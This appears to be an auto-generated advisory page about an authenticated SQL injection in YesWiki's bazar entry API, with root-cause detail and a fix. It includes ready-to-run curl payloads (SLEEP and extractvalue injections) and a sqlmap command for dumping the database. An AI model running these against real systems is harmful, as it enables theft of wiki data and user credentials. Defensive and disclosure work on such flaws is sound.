YesWiki, SQL Injection, CVE(unknown) (Critical)

Listen to this Post

The vulnerability exists in YesWiki bazar module, specifically in tools/bazar/services/EntryManager.php at line 704. The function formatDataBeforeSave() processes user-supplied data from $_POST[‘id_fiche’] without any sanitization. This value is directly concatenated into a raw SQL query string. The vulnerable line reads: $result = $this->dbService->loadSingle( ‘SELECT MIN(time) as firsttime FROM ‘ . $this->dbService->prefixTable(‘pages’) . “WHERE tag='” . $data[‘id_fiche’] . “‘” ); The $data[‘id_fiche’] comes from the POST parameter id_fiche. The DbService::escape() method exists but is never called here. loadSingle() passes the unsanitized string directly to mysqli_query(). An attacker must authenticate as any user because the API route requires only acl:{“+”} (any logged-in user). The attack vector is a POST request to /api/entries/{formId} with id_fiche parameter containing SQL payload. ApiController::createEntry() first calls isEntry() on the id_fiche value; since the injected value is not an existing entry, it proceeds to create(). create() then calls formatDataBeforeSave() leading to the injection point. The dbService->loadSingle() executes the query, allowing time-based blind SQL injection. Confirmation payload: id_fiche=’ OR SLEEP(3) OR ‘ causes a 3-second delay. Error-based extraction works via payload: id_fiche=’ AND extractvalue(1,concat(0x7e,@@version))– – which returns MySQL version in XPATH error. The vulnerability allows full database dump using binary search techniques. Docker PoC shows normal query returns timestamp, while injected query delays 3 seconds. The root cause is improper handling of user input in SQL construction. Proposed fix is to use escape() or parameterized queries.

dailycve form:

Platform: YesWiki unknown
Version: Not specified
Vulnerability: SQL injection
Severity: Critical
date: 2026-04-18

Prediction: 2026-04-30

What Undercode Say:

Time-based blind confirmation
curl -s -X POST 'http://TARGET/?api/entries/1' \
-H 'Cookie: wikini_session=<SESSION>' \
-d "antispam=1&bf_titre=Test&id_fiche=' OR SLEEP(3) OR '"
Error-based version extraction
curl -s -X POST 'http://TARGET/?api/entries/1' \
-H 'Cookie: wikini_session=<SESSION>' \
-d "antispam=1&bf_titre=Test&id_fiche=' AND extractvalue(1,concat(0x7e,@@version))-- -"
Automated dump with sqlmap
sqlmap -u 'http://TARGET/?api/entries/1' \
--data "antispam=1&bf_titre=T&id_fiche=test" \
-p id_fiche --cookie "wikini_session=<SESSION>" \
--dbms=MySQL --technique=BET --level=2

how Exploit:

Authenticate to YesWiki. Send POST to /api/entries/{formId} with malicious id_fiche. Use SLEEP() for time-based blind or extractvalue() for error-based. Dump database via binary search or sqlmap.

Protection from this CVE

Update YesWiki to patched version. Replace vulnerable line with parameterized query or call $this->dbService->escape($data[‘id_fiche’]). Apply input validation and use prepared statements.

Impact:

Full database compromise. Attacker extracts all wiki pages, user credentials, private data. Time-based blind SQL injection enables complete data exfiltration.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top